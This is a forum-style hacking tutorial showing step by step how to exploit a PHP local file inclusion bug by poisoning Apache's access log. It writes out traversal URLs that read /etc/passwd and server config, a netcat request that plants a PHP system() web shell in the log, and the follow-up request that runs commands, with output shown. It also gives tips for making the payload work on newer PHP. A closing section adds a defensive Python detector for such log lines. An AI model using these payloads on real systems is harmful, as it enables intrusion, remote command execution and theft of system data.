Exploiting LFI with the Apache Log Injection method

LFI - Apache Log Injection

This is one of the older hacking techniques and it is nearly forgotten. These days most people exploit LFI through /proc/self/environ injection, and when environ can't be injected they declare the LFI "not exploitable". That doesn't hold for xcrew: there is still a technique worth trying (back in the day everyone used it). It is usually called Apache Log Injection, or log poisoning: inject a one-line command backdoor (a PHP system() call) into Apache's access log, then include that log through the LFI, so the attacker ends up with a backdoor.

The technique abuses the fact that Apache logs every request, including a backdoor script slipped into one. The method goes like this:

Request a fake page from the victim. The "page" is really the backdoor code (the exact request line is shown in the netcat session further down).
Because Apache logs every request, that little script lands in its access log.
The attacker then includes the log through the LFI and gets the backdoor they planted.

The real challenge is "finding the access log" itself.

That's the concept, simple as that, and practice is the same. Straight to it.

LFI bug: http://localhost/content.php?page=[LFI]
Code:

Warning: include(/media/E/LocalServer/htdocs): failed to open stream: Not a directory in /media/E/LocalServer/htdocs/content.php on line 1 Warning: include(): Failed opening './' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /media/E/LocalServer/htdocs/content.php on line 1


Next, try to include /etc/passwd.
Code:

http://localhost/content.php?page=../../../../../etc/passwd

And it works:
Code:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false


OK, local include works. Next we look for the access log, and this is where the real challenge is: finding Apache's access log is hard enough to be frustrating. To make it easier, look for httpd.conf first.

Code:

http://localhost/content.php?page=../../../../../etc/httpd.conf


Not there. Try another place:
Code:

http://localhost/content.php?page=../../../../../etc/httpd/conf/httpd.conf


Not there either. Keep going; let's check the OS first.
Code:

http://localhost/content.php?page=../../../../../etc/issue

Ubuntu:
Code:

Ubuntu 10.04 LTS \n \l


A quick search for where Apache keeps its config on Ubuntu 10.04, then try it:
Code:

http://localhost/content.php?page=../../../../../etc/apache2/apache2.conf

Got it!!
Code:

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned. 
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at );
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#
#
LockFile /var/lock/apache2/accept.lock
#

#


#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15

##
## Server-Pool Size Regulation (MPM specific)
##

# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          150
    MaxRequestsPerChild   0


# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves


    StartServers          2
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxClients          150
    MaxRequestsPerChild   0


# event MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          2
    MaxClients          150
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxRequestsPerChild   0


# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#

AccessFileName .htaccess

#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#

    Order allow,deny
    Allow from all
    #Satisfy all


#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain


#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn

# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf

# Include all the user configurations:
Include /etc/apache2/httpd.conf

# Include ports listing
Include /etc/apache2/ports.conf

#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

#
# Define an access log for VirtualHosts that don't define their own logfile
CustomLog /var/log/apache2/other_vhosts_access.log vhost_combined


# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
Include /etc/apache2/conf.d/

# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/


Read through it and include each referenced file if you want to see them. The part that matters is this:
Code:

ErrorLog /var/log/apache2/error.log

That's error.log, so access.log most likely sits in the same directory (the CustomLog line for other_vhosts_access.log in the same file points at that directory too; the per-site access.log itself is set in sites-enabled/). Let's try:
Code:

http://localhost/content.php?page=../../../../..//var/log/apache2/access.log

Yep, got it!!
Code:

127.0.0.1 - - [27/Jul/2011:11:24:44 +0700] "GET /content.php?page= HTTP/1.1" 200 450 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:24:44 +0700] "GET /favicon.ico HTTP/1.1" 404 500 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:24:47 +0700] "GET /favicon.ico HTTP/1.1" 404 500 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:11:25:26 +0700] "GET /content.php?page=../../../../../etc/passwd HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:13:52:59 +0700] "GET /content.php?page=../../../../../etc/httpd.conf HTTP/1.1" 200 467 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:13:53:24 +0700] "GET /content.php?page=../../../../../etc/httpd/conf/httpd.conf HTTP/1.1" 200 473 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:14:46:50 +0700] "GET /content.php?page=../../../../../etc/issue HTTP/1.1" 200 317 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"
127.0.0.1 - - [27/Jul/2011:14:48:24 +0700] "GET /content.php?page=../../../../../etc/apache2/apache2.conf HTTP/1.1" 200 3317 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"


Look at the log: our whole attack is right there =))

Now that we have access.log, it's time to contaminate it with a one-line backdoor script. How? With netcat, because nc sends exactly the bytes you type. A browser would percent-encode the `<`, `>` and spaces in the path, and the log would then hold `%3C%3Fphp...`, which include() prints rather than executes.

Open the connection:
nc -vv localhost 80

Contaminate the log with a fake request:
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0

Add the request headers:
Host: localhost
User-agent: xzilla

Press Enter 2-3 times to send the request.

Code:

array@xcrew:~$ nc -vv localhost 80
xcrew.underground.coder.team [127.0.0.1] 80 (www) open
GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0
HOST: localhost
User-agent: xzilla

HTTP/1.1 404 Not Found
Date: Wed, 27 Jul 2011 08:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 277
Connection: close
Content-Type: text/html; charset=iso-8859-1

404 Not Found
Not Found
The requested URL /< was not found on this server.
Apache/2.2.14 (Ubuntu) Server at localhost Port 80

 sent 80, rcvd 480
array@xcrew:~$


Not Found! lol
That's right: there's no such file, but the request went into the log anyway, and that's all we need. Notice what the 404 says, though: "The requested URL /<". The request line really began with `/<?php` (Apache cuts the path at the `?`, leaving `/<`); the forum's rendering swallowed the `<?php` open tag (and the bit after it up to the `'`) from the listings above. Without that open tag the log line would be printed by include(), not executed. Now let's open the access log again and make sure the backdoor is in there.
Code:

http://localhost/content.php?page=../../../../..//var/log/apache2/access.log

Oops, an error at the bottom:
Code:

Warning: system(): Cannot execute a blank command in /var/log/apache2/access.log on line 10


That shows the system() call is now sitting in access.log; it only errored because no command was passed, so it ran system('') with an empty string. Now let's actually run something. Remember which variable the payload reads the command from? $_GET[cmd], from this line:
Code:

GET /'; system($_GET[cmd]); exit; ?> HTTP/1.0

Two details of that payload matter. The bare `cmd` works because PHP 5 treats an undefined constant as the string 'cmd' (with a notice); PHP 8 makes that a fatal error, and you can't write `"cmd"` because Apache logs a literal double quote as `\"`, so use `$_GET['cmd']` with single quotes. The `exit;` after system() stops PHP right there, so the rest of the log and the page aren't dumped after the command output.

Now send a command:
Code:

http://localhost/content.php?page=../../../../..//var/log/apache2/access.log&cmd=uname%20-a;id;pwd

And the result:
Code:

Linux xcrew.underground.coder.team 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux
uid=1000(array) gid=33(www-data) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),29(audio),30(dip),33(www-data),44(video),46(plugdev),104(fuse),105(lpadmin),119(admin),122(sambashare)
/media/E/LocalServer/htdocs


The command runs fine....

Look closely at that id output, though: PHP is running as uid 1000 (array), the author's own user, whose groups include 4(adm). On a stock Ubuntu install the files in /var/log/apache2/ are owned by root:adm with mode 0640, so a PHP running as plain www-data cannot open access.log (or error.log) and this trick fails with "Permission denied". Check that the log is readable before spending time on log poisoning; the environ method from the intro stays the fallback when it is not.

So now we know how to exploit LFI with the Apache Log Injection method (not environ injection for once).
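From the defender's side, the log excerpt shown earlier and the poisoned line are exactly what a detection rule should catch. The following is an added example written for this page, not the author's code: a parser for the `combined` LogFormat from the apache2.conf above (it has to cope with Apache's `\"` escaping, since a poisoned line can carry quotes) and a scanner that flags PHP tags, superglobals or exec functions in the request line, Referer or User-Agent, traversal sequences, and includes that point at log paths. The sample lines are constructed after the ones on the page; the function names and the patterns are my own.

```python
"""Detect Apache access-log poisoning and the LFI that triggers it.

Added example for this write-up, not the author's code. The regexes, the
function names and the sample log lines (modelled on the page's) are my own.
"""
import re

# 'combined' LogFormat: %h %l %u %t "%r" %>s %O "%{Referer}i" "%{User-Agent}i".
# Quoted fields may contain Apache-escaped \" and \\, so [^"]* is not enough.
_Q = r'(?:[^"\\]|\\.)*'
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _Q + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _Q + r')" "(?P<ua>' + _Q + r')"$'
)

PHP_CODE = re.compile(
    r"<\?(?:php\b|=)"                                  # open tag
    r"|\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"        # superglobals
    r"|\b(?:system|passthru|shell_exec|exec|eval|assert)\s*\(",
    re.I,
)
TRAVERSAL = re.compile(r"\.\.(?:/|%2f|\\)|%2e%2e(?:/|%2f)", re.I)
LOG_TARGET = re.compile(r"/var/log/(?:apache2|httpd|nginx)/|/proc/self/environ", re.I)

# Constructed sample: lines 1, 2 and 5 follow the page's own log excerpt, lines 3
# and 4 are what the page's nc request (and a User-Agent variant) leave behind.
SAMPLE_LOG = """\
127.0.0.1 - - [27/Jul/2011:11:24:44 +0700] "GET /content.php?page=home HTTP/1.1" 200 450 "-" "Mozilla/5.0 (X11; U; Linux i686)"
127.0.0.1 - - [27/Jul/2011:11:25:26 +0700] "GET /content.php?page=../../../../../etc/passwd HTTP/1.1" 200 1074 "-" "Mozilla/5.0 (X11; U; Linux i686)"
127.0.0.1 - - [27/Jul/2011:15:49:19 +0700] "GET /<?php system($_GET['cmd']); exit; ?> HTTP/1.0" 404 277 "-" "xzilla"
127.0.0.1 - - [27/Jul/2011:15:50:02 +0700] "GET / HTTP/1.0" 200 450 "-" "<?php echo \\"pwned\\"; ?>"
127.0.0.1 - - [27/Jul/2011:15:51:40 +0700] "GET /content.php?page=../../../../..//var/log/apache2/access.log&cmd=uname%20-a;id;pwd HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; U; Linux i686)"
"""


def parse_combined(line: str):
    """Return the fields of one 'combined' log line, or None if it doesn't parse."""
    m = COMBINED.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def analyze(lines):
    """Return (line_no, reason, field) findings for a sequence of log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        if not line.strip():
            continue
        rec = parse_combined(line)
        if rec is None:
            findings.append((n, "unparseable", "line"))
            continue
        for field in ("request", "referer", "ua"):
            if PHP_CODE.search(rec[field]):
                findings.append((n, "php_code", field))     # the log is now a web shell
        if TRAVERSAL.search(rec["request"]):
            findings.append((n, "traversal", "request"))
        if LOG_TARGET.search(rec["request"]):
            findings.append((n, "log_include", "request"))  # someone is pulling the trigger
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG.splitlines()):
        print(finding)
```

A `php_code` hit means the log file itself is now dangerous to include from any PHP (a log viewer, a debug page), not just through this LFI, so the file should be rotated and the contaminated copy kept only as evidence; a `log_include` hit next to a `traversal` hit is the trigger request and tells you which script has the include bug.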



(explorer crew)
